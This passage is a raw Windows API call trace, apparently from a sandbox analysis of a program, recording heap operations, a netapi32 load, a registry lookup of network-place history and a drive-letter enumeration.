returned 1 [0157.001] NetApiBufferSize (in: Buffer=0x8dc168, ByteCount=0x87e470 | out: ByteCount=0x87e470) returned 0x0 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba048 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0157.001] FreeLibrary (hLibModule=0x74ac0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba648 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba360 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0157.004] PeekMessageW (in: lpMsg=0x87ead4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ead4) returned 0 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad40 | out: hHeap=0x8a0000) returned 1 [0157.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0157.005] PeekMessageW (in: lpMsg=0x87ead4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ead4) returned 0 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba030 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba048 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0a8 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba558 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8d0 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0157.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de880 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.006] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0a8 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba558 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de880 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0157.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0157.006] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba558 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0157.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.007] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0157.007] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0157.007] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x74af0000 [0157.016] NetApiBufferFree (Buffer=0x8dc168) returned 0x0 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x90ab20 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2b8 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2d0 [0157.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0157.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0157.017] FreeLibrary (hLibModule=0x74af0000) returned 1 [0157.019] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0157.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de880 [0157.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2d0 [0157.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0157.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2b8 [0157.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.020] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0157.020] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.020] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0157.020] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.020] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.020] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.020] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.020] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de880 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1820 [0157.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0157.021] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8d0 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba048 [0157.021] CharUpperBuffW (in: lpsz="HKCU64", cchLength=0x6 | out: lpsz="HKCU64") returned 0x6 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0157.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0157.021] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\PublishingWizard\\AddNetworkPlace\\AddNetPlace\\LocationMRU", ulOptions=0x0, samDesired=0x20119, phkResult=0x87f6ac | out: phkResult=0x87f6ac*=0x0) returned 0x2 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7398 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba048 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0157.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8d0 | out: hHeap=0x8a0000) returned 1 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8d0 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba048 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0157.022] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x90ab20 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ab20 | out: hHeap=0x8a0000) returned 1 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1940 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a78 [0157.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9aa8 [0157.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0157.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0157.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0157.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0157.023] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1940 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0157.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d90 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0157.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0157.023] CharLowerBuffW (in: lpsz="ALL", cchLength=0x3 | out: lpsz="all") returned 0x3 [0157.023] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0157.023] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0157.024] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0157.024] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0157.025] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0157.025] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0157.025] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0157.026] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0157.026] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0157.027] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0157.028] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d90 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x90ab20 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1860 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d90 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19e0 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2d0 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2b8 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree 